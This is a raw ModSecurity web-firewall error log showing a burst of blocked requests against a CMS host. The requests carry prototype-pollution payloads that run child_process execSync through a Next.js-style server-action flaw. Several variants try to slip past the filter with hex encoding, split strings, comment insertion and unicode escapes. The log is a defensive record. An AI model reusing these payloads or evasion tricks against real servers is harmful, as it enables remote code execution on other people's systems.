"(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/de"] [unique_id "adJm1Zc83uMXRUE9zvQTdwAAAcY"] [Sun Apr 05 15:42:45.510185 2026] [:error] [pid 23077:tid 23106] [client 172.94.9.253:46796] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/posts"] [unique_id "adJm1Zc83uMXRUE9zvQTeAAAAdc"] [Sun Apr 05 15:42:45.510559 2026] [:error] [pid 31198:tid 31270] [client 172.94.9.253:46770] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/posts"] [unique_id "adJm1TT5TgrBR8xRnfXBMAAAAVI"] [Sun Apr 05 15:42:45.511353 2026] [:error] [pid 23077:tid 23107] [client 172.94.9.253:46764] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/posts"] [unique_id "adJm1Zc83uMXRUE9zvQTeQAAAdg"] [Sun Apr 05 15:42:45.519237 2026] [:error] [pid 23077:tid 23090] [client 172.94.9.253:46830] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/home"] [unique_id "adJm1Zc83uMXRUE9zvQTegAAAcc"] [Sun Apr 05 15:42:45.538221 2026] [:error] [pid 31198:tid 31258] [client 172.94.9.253:46844] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/home"] [unique_id "adJm1TT5TgrBR8xRnfXBMgAAAUY"] [Sun Apr 05 15:42:45.588537 2026] [:error] [pid 23077:tid 23084] [client 172.94.9.253:46756] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/cart"] [unique_id "adJm1Zc83uMXRUE9zvQTdgAAAcE"] [Sun Apr 05 15:42:45.656850 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:46876] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/posts"] [unique_id "adJm1bxQSOrq_iRTM7dquAAAAQI"] [Sun Apr 05 15:42:45.657235 2026] [:error] [pid 23077:tid 23106] [client 172.94.9.253:46884] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/home"] [unique_id "adJm1Zc83uMXRUE9zvQTfAAAAdc"] [Sun Apr 05 15:42:45.657245 2026] [:error] [pid 23077:tid 23089] [client 172.94.9.253:46888] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/posts"] [unique_id "adJm1Zc83uMXRUE9zvQTewAAAcY"] [Sun Apr 05 15:42:45.657705 2026] [:error] [pid 13019:tid 13251] [client 172.94.9.253:46858] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/posts"] [unique_id "adJm1bxQSOrq_iRTM7dquQAAAQs"] [Sun Apr 05 15:42:45.658001 2026] [:error] [pid 13019:tid 13264] [client 172.94.9.253:46892] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/home"] [unique_id "adJm1bxQSOrq_iRTM7dqugAAARg"] [Sun Apr 05 15:42:45.658079 2026] [:error] [pid 23077:tid 23107] [client 172.94.9.253:46864] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/home"] [unique_id "adJm1Zc83uMXRUE9zvQTfQAAAdg"] [Sun Apr 05 15:42:45.659197 2026] [:error] [pid 1309:tid 1366] [client 172.94.9.253:46906] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/posts"] [unique_id "adJm1T-XKUNJEHmNu6G7zAAAAII"] [Sun Apr 05 15:42:45.659990 2026] [:error] [pid 1306:tid 1328] [client 172.94.9.253:46878] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/home"] [unique_id "adJm1YRhslBlnapNAUOXmQAAAAs"] [Sun Apr 05 15:42:45.708035 2026] [:error] [pid 1503:tid 1525] [client 172.94.9.253:46856] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/login"] [unique_id "adJm1UI7AjfUQYCN-J7D6QAAANA"] [Sun Apr 05 15:42:45.750416 2026] [:error] [pid 23077:tid 23091] [client 172.94.9.253:46910] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/posts"] [unique_id "adJm1Zc83uMXRUE9zvQTfwAAAcg"] [Sun Apr 05 15:42:45.784722 2026] [:error] [pid 23077:tid 23106] [client 172.94.9.253:46938] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/post"] [unique_id "adJm1Zc83uMXRUE9zvQTgAAAAdc"] [Sun Apr 05 15:42:45.786023 2026] [:error] [pid 1503:tid 1510] [client 172.94.9.253:46956] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/blog"] [unique_id "adJm1UI7AjfUQYCN-J7D7AAAAME"] [Sun Apr 05 15:42:45.786945 2026] [:error] [pid 1309:tid 1378] [client 172.94.9.253:46950] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match 